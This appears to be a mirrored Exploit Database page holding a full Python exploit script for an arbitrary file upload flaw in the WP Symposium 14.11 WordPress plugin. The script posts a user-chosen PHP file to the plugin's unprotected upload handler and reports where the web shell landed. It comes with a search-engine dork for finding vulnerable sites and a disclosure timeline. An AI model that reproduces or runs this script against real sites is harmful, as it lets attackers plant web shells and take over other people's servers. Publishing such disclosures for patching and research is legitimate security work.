WordPress Plugin WP Symposium 14.11 – Arbitrary File Upload

• Exploit Database
• 112 阅读

• 作者： Claudio Viviani
  日期： 2014-12-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35543/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211

  #!/usr/bin/python # # Exploit Name: WordPress WP Symposium 14.11 Shell Upload Vulnerability # # # Vulnerability discovered by Claudio Viviani # # Exploit written by Claudio Viviani # # # 2014-11-27:Discovered vulnerability # 2014-12-01:Vendor Notification (Twitter) # 2014-12-02:Vendor Notification (Web Site) # 2014-12-04:Vendor Notification (E-mail) # 2014-12-11:No Response/Feedback # 2014-12-11:Published # # Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs # # -------------------------------------------------------------------- # # The upload function located on "/wp-symposium/server/file_upload_form.php " is protected: # # if ($_FILES["file"]["error"] > 0) { # echo "Error: " . $_FILES["file"]["error"] . "<br>"; # } else { # $allowedExts = &apos;,&apos;.get_option(WPS_OPTIONS_PREFIX.&apos;_image_ext&apos;).&apos;,&apos;.get_option(WPS_OPTIONS_PREFIX.&apos;_doc_ext&apos;).&apos;,&apos;.get_option(WPS_OPTIONS_PREFIX.&apos;_video_ext&apos;); # //echo "Upload: " . $_FILES["file"]["name"] . "<br>"; # $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION); # //echo "Extension: " . $ext . "<br />"; # if (strpos($allowedExts, $ext)) { # $extAllowed = true; # } else { # $extAllowed = false; # } # //echo "Type: " . $_FILES["file"]["type"] . "<br>"; # //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>"; # //echo "Stored in: " . $_FILES["file"]["tmp_name"]; # # if (!$extAllowed) { # echo __(&apos;Sorry, file type not allowed.&apos;, WPS_TEXT_DOMAIN); # } else { # // Copy file to tmp location # ... # ... # ... # # BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension # # The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/" # # --------------------------------------------------------------------- # # Dork google:index of "wp-symposium" # # # Tested on BackBox 3.x with python 2.6 # # Http connection import urllib, urllib2, socket # import sys # String manipulator import string, random # Args management import optparse # File management import os, os.path, mimetypes   # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print(&apos;[X] You must insert http:// or https:// procotol&apos;) sys.exit(1) else: return url   # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): print &apos;[X] &apos;+file+&apos; file is missing or not readable&apos; sys.exit(1) else: return file # Get file&apos;s mimetype def get_content_type(filename): return mimetypes.guess_type(filename)[0] or &apos;application/octet-stream&apos;   def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): return &apos;&apos;.join(random.choice(chars) for _ in range(size))   # Create multipart header def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):   getfields = dict() getfields[&apos;uploader_uid&apos;] = &apos;1&apos; getfields[&apos;uploader_dir&apos;] = &apos;./&apos;+randDirName getfields[&apos;uploader_url&apos;] = url_symposium_upload   payloadcontent = open(payloadname).read()   LIMIT = &apos;----------lImIt_of_THE_fIle_eW_$&apos; CRLF = &apos;\r\n&apos;   L = [] for (key, value) in getfields.items(): L.append(&apos;--&apos; + LIMIT) L.append(&apos;Content-Disposition: form-data; name="%s"&apos; % key) L.append(&apos;&apos;) L.append(value)   L.append(&apos;--&apos; + LIMIT) L.append(&apos;Content-Disposition: form-data; name="%s"; filename="%s"&apos; % (&apos;files[]&apos;, randShellName+".php")) L.append(&apos;Content-Type: %s&apos; % get_content_type(payloadname)) L.append(&apos;&apos;) L.append(payloadcontent) L.append(&apos;--&apos; + LIMIT + &apos;--&apos;) L.append(&apos;&apos;) body = CRLF.join(L) return body   banner = """ ___ ___ __ | Y .-----.----.--|.-----.----.-----.-----.-----. |.| |_| _|_|_| _|-__|__ --|__ --| |. / \|_____|__| |_____| __|__| |_____|_____|_____| |:||__| |::.|:. | --- ---&apos; ___ ___ ________________ | Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------. |.| |.1 |______| 1___||||_|_|__ --||||| |. / \|.____||____ |___|__|__|__| __|_____|_____|__|_____|__|__|__| |:|:||:1 |_____||__| |::.|:. |::.||::.. . | </code>--- ---<code>---&apos;</code>-------&apos; Wp-Symposium Sh311 Upl04d Vuln3r4b1l1ty v14.11   Written by:   Claudio Viviani   http://www.homelab.it   info@homelab.it homelabit@protonmail.ch   https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """   commandList = optparse.OptionParser(&apos;usage: %prog -t URL -f FILENAME.PHP [--timeout sec]&apos;) commandList.add_option(&apos;-t&apos;, &apos;--target&apos;, action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option(&apos;-f&apos;, &apos;--file&apos;, action="store", help="Insert file name, ex: shell.php", ) commandList.add_option(&apos;--timeout&apos;, action="store", default=10, type="int", help="[Timeout Value] - Default 10", )   options, remainder = commandList.parse_args()   # Check args if not options.target or not options.file: print(banner) commandList.print_help() sys.exit(1)   payloadname = checkfile(options.file) host = checkurl(options.target) timeout = options.timeout   print(banner)   socket.setdefaulttimeout(timeout)   url_symposium_upload = host+&apos;/wp-content/plugins/wp-symposium/server/php/&apos;   content_type = &apos;multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$&apos;   randDirName = id_generator() randShellName = id_generator()   bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)   headers = {&apos;User-Agent&apos;: &apos;Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36&apos;, &apos;content-type&apos;: content_type, &apos;content-length&apos;: str(len(bodyupload)) }   try: req = urllib2.Request(url_symposium_upload+&apos;index.php&apos;, bodyupload, headers) response = urllib2.urlopen(req) read = response.read()   if "error" in read or read == "0" or read == "": print("[X] Upload Failed :(") else: print("[!] Shell Uploaded") print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")   except urllib2.HTTPError as e: print("[X] "+str(e)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e))